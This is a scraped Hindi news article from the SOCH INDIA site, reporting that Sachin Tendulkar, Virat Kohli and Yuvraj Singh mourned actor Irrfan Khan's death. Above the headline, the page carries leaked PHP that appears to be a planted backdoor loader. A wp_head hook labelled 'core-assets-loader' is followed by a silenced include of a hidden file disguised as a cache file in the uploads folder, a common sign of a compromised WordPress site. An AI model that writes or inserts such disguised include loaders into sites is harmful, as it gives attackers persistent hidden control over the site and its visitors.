add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इरफान खान के जाने पर शोक में सचिन और विराट, क्रिकेट जगत में दुख की लहर – SOCH INDIA
Menu

खेल
इरफान खान के जाने पर शोक में सचिन और विराट, क्रिकेट जगत में दुख की लहर

nobanner

बॉलीवुड एक्टर इरफान खान का बुधवार को मुंबई के कोकिलाबेन अस्पताल में निधन हो गया. वह 54 साल के थे और लंबे समय से एक दुलर्भ किस्म के कैंसर से जंग लड़ रहे थे. दो साल पहले मार्च 2018 में इरफान को न्यूरो इंडोक्राइन ट्यूमर नामक बीमारी का पता चला था. इरफान खान के अचानक निधन से उनके फैंस और खेल जगत भी सदमे में हैं.

इरफान खान के अचानक चले जाने पर खेल जगत ने शोक जताया है. टीम इंडिया के कप्तान विराट कोहली ने ट्वीट कर इरफान खान ने निधन पर अपना दुख प्रकट किया है. विराट कोहली के अलावा मास्टर ब्लास्टर सचिन तेंदुलकर ने भी शोक जताया है, जो इरफान के अचानक जाने से हैरान हैं.

सचिन तेंदुलकर ने लिखा, ‘इरफान खान के निधन के बारे में सुनकर बहुत दुख हुआ. वो मेरे पसंदीदा एक्टरों में से थे और मैंने उनकी लगभग सभी फिल्में देखी थीं.’ उनकी आखिरी फिल्म ‘अंग्रेजी मीडियम’ मैंने देखी थी, उनकी एक्टिंग शानदार थी, भगवान उनकी आत्मा को शांति दे, उनके करीबियों के लिए मेरी संवेदनाएं’.

विराट कोहली ने लिखा, ‘इरफान के जाने की खबर को सुनकर दिल को काफी दुख पहुंचा है, क्या कमाल का टैलेंट था उनके पास, अपने शानदार अभिनय से सभी के दिलों को छुआ था, उनके आत्मा को शांती मिले.’
खुद कैंसर के मुश्किल दौर से गुजर चुके भारत के पूर्व धाकड़ बल्लेबाज युवराज सिंह ने लिखा, ‘मैं इस यात्रा को जानता हूं, मैं इस दर्द को जानता हूं और मैं यह भी जानता हूं कि उन्होंने आखिरी समय तक लड़ाई की होगी. कुछ लोग भाग्शाली होते हैं जो बचने में कामयाब होते हैं और कुछ इतने भाग्यशाली नहीं होते. मुझे पता है कि इरफान खान आप बहुत ही बेहतर जगह पर होंगे. मेरी संवेदना आपके परिवार के साथ है. भगवान उनकी आत्मा को शांति दे.’